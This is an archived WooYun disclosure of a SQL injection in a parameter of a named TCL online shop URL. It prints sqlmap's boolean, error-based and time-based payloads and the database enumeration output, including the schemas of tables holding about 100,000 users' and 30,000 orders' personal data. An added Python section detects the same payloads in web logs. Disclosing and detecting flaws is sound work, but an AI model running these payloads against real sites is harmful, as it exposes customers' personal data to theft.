WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
2014-09-29: Details reported to the vendor, awaiting vendor processing
2014-09-29: Vendor has confirmed; details disclosed to the vendor only
2014-10-09: Details disclosed to core white hats and relevant domain experts
2014-10-19: Details disclosed to regular white hats
2014-10-29: Details disclosed to intern white hats
2014-11-13: Details disclosed to the public
Affects a large amount of order data and poses a risk of user information leakage: roughly 100,000 users and roughly 30,000 orders. Nothing was damaged, and this can be verified :) Please fix as soon as possible!!
Vulnerable URL:
http://shop.tcl.com/mall/goods/index.html?cat_id=20&attrs_51=515
It throws a database error straight away, so the next step is the routine injection test of the parameter attrs_51. Payloads:
---
Place: GET
Parameter: attrs_51
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: cat_id=20&attrs_51=515 RLIKE (SELECT (CASE WHEN (8708=8708) THEN 515 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat_id=20&attrs_51=515 AND (SELECT 2138 FROM(SELECT COUNT(*),CONCAT(0x716c676b71,(SELECT (CASE WHEN (2138=2138) THEN 1 ELSE 0 END)),0x7161706e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=20&attrs_51=515 AND SLEEP(5)
---
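As an added defensive example (not part of the original report), the following Python flags the three payload families sqlmap reported for attrs_51 when they appear in Nginx access-log lines. The log lines are constructed here with a documentation-range client address; only the payload strings are taken from the sqlmap output above, and the signature regexes are this example's own, not anything the report used.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Signatures for the techniques sqlmap reported against attrs_51: boolean-based blind (RLIKE + CASE WHEN),
# error-based (the FLOOR(RAND(0)*2) ... GROUP BY duplicate-key trick) and time-based blind (SLEEP/BENCHMARK).
SIGNATURES = {
    "boolean-blind": re.compile(r"\bRLIKE\b.*\bCASE\s+WHEN\b", re.I | re.S),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "time-blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}
# Nginx "combined" log format up to the status code; the remainder of the line is not needed here.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) ')

def classify_value(value):
    """Return the signature names matched by one already percent-decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_line(line):
    """Return (ip, parameter, technique, status) findings for one log line; [] if clean or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # parse_qs percent-decodes each value once, so %28 / %3D / %2A are restored before matching.
    for param, values in parse_qs(urlsplit(m.group("uri")).query, keep_blank_values=True).items():
        for value in values:
            for technique in classify_value(value):
                findings.append((m.group("ip"), param, technique, int(m.group("status"))))
    return findings

def scan_log(lines):
    """Scan an iterable of log lines and return all findings in log order."""
    return [f for line in lines for f in scan_line(line)]

def make_line(ip, value, status, ua):
    """Build one constructed combined-format line with attrs_51 set to the percent-encoded `value`."""
    uri = "/mall/goods/index.html?cat_id=20&attrs_51=" + quote(value, safe="")
    return f'{ip} - - [29/Sep/2014:01:06:22 +0800] "GET {uri} HTTP/1.1" {status} 8123 "-" "{ua}"'

# Constructed sample log (not from the report): one legitimate request, then the three payloads
# exactly as sqlmap printed them above, from a documentation-range client address.
SAMPLE_LOG = [
    make_line("203.0.113.7", "515", 200, "Mozilla/5.0"),
    make_line("203.0.113.7", "515 RLIKE (SELECT (CASE WHEN (8708=8708) THEN 515 ELSE 0x28 END))", 200, "sqlmap/1.0"),
    make_line("203.0.113.7", "515 AND (SELECT 2138 FROM(SELECT COUNT(*),CONCAT(0x716c676b71,(SELECT (CASE WHEN (2138=2138) "
              "THEN 1 ELSE 0 END)),0x7161706e71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
              500, "sqlmap/1.0"),
    make_line("203.0.113.7", "515 AND SLEEP(5)", 200, "sqlmap/1.0"),
]
```

Running scan_log(SAMPLE_LOG) yields one finding per injected request and none for the legitimate one; the 500 status on the error-based line is the same symptom the report describes as the page erroring out.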
Enumerating databases:
[01:06:22] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.0
[01:06:22] [INFO] fetching database names
[01:06:27] [INFO] the SQL query used returns 3 entries
[01:06:30] [INFO] retrieved: information_schema
[01:06:34] [INFO] retrieved: shoptcl
[01:06:37] [INFO] retrieved: test
available databases [3]:
[*] information_schema
[*] shoptcl
[*] test
Enumerating tables: the shoptcl database contains 152 tables.
Since this is an online store, let's look at the structure of the order table :)
Database: shoptcl
Table: ec_order
[49 columns]
+----------------------+---------------+
| Column               | Type          |
+----------------------+---------------+
| adjust_fee           | decimal(10,2) |
| buyer_message        | varchar(255)  |
| client_ip            | varchar(50)   |
| created_time         | datetime      |
| discount_fee         | decimal(10,2) |
| end_time             | datetime      |
| evaluate_status      | int(11)       |
| invoice_name         | varchar(255)  |
| invoice_type         | int(11)       |
| modified_time        | datetime      |
| need_invoice         | int(11)       |
| order_discount_fee   | decimal(10,2) |
| order_from           | varchar(50)   |
| order_id             | int(11)       |
| order_sn             | varchar(64)   |
| order_status         | int(11)       |
| pay_id               | int(11)       |
| pay_status           | int(11)       |
| pay_time             | datetime      |
| payment              | decimal(10,2) |
| payment_code         | varchar(50)   |
| payment_type         | int(11)       |
| point_fee            | decimal(10,2) |
| post_fee             | decimal(10,2) |
| present_point        | int(11)       |
| print_number         | int(11)       |
| receiver_address     | varchar(255)  |
| receiver_city        | varchar(50)   |
| receiver_district    | varchar(150)  |
| receiver_district_id | int(11)       |
| receiver_email       | varchar(150)  |
| receiver_mobile      | varchar(50)   |
| receiver_name        | varchar(50)   |
| receiver_phone       | varchar(30)   |
| receiver_state       | varchar(50)   |
| receiver_zip         | varchar(20)   |
| refund_status        | int(11)       |
| seller_email         | varchar(50)   |
| seller_memo          | varchar(255)  |
| seller_mobile        | varchar(50)   |
| seller_name          | varchar(50)   |
| seller_phone         | varchar(50)   |
| shipping_time        | datetime      |
| shop_id              | int(11)       |
| status               | int(11)       |
| total_fee            | decimal(10,2) |
| trade_source         | varchar(255)  |
| use_point            | int(11)       |
| user_id              | int(11)       |
+----------------------+---------------+
And then it got ugly: the amount of data is quite large, close to 30,000 orders. Screenshot attached as proof.
Next, the user table, which gave me a shock: nearly 100,000 users.
Database: shoptcl
Table: ro_user
[24 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| birthday      | datetime     |
| description   | varchar(400) |
| email         | varchar(64)  |
| email_status  | tinyint(4)   |
| encrypt       | varchar(32)  |
| gender        | tinyint(4)   |
| id            | int(11)      |
| last_ip       | varchar(32)  |
| last_login    | datetime     |
| last_time     | datetime     |
| login_num     | int(11)      |
| mobilephone   | varchar(32)  |
| modified_time | datetime     |
| nickname      | varchar(64)  |
| password      | varchar(32)  |
| pid           | varchar(20)  |
| real_name     | varchar(64)  |
| reg_ip        | varchar(32)  |
| reg_time      | datetime     |
| status        | tinyint(4)   |
| telephone     | varchar(32)  |
| third_pintai  | varchar(40)  |
| third_uid     | varchar(255) |
| user_name     | varchar(64)  |
+---------------+--------------+
:) Filter the parameter input. Also, the site's database error output can be hidden. I only dumped a small amount of test data; nothing was damaged and I did not go any deeper, then hit Ctrl+C. Please arrange a fix as soon as possible :)
Severity: High
Vulnerability Rank: 20
Confirmed: 2014-09-29 16:42
Thank you for your work; this has been forwarded to the relevant unit for confirmation and handling.
None yet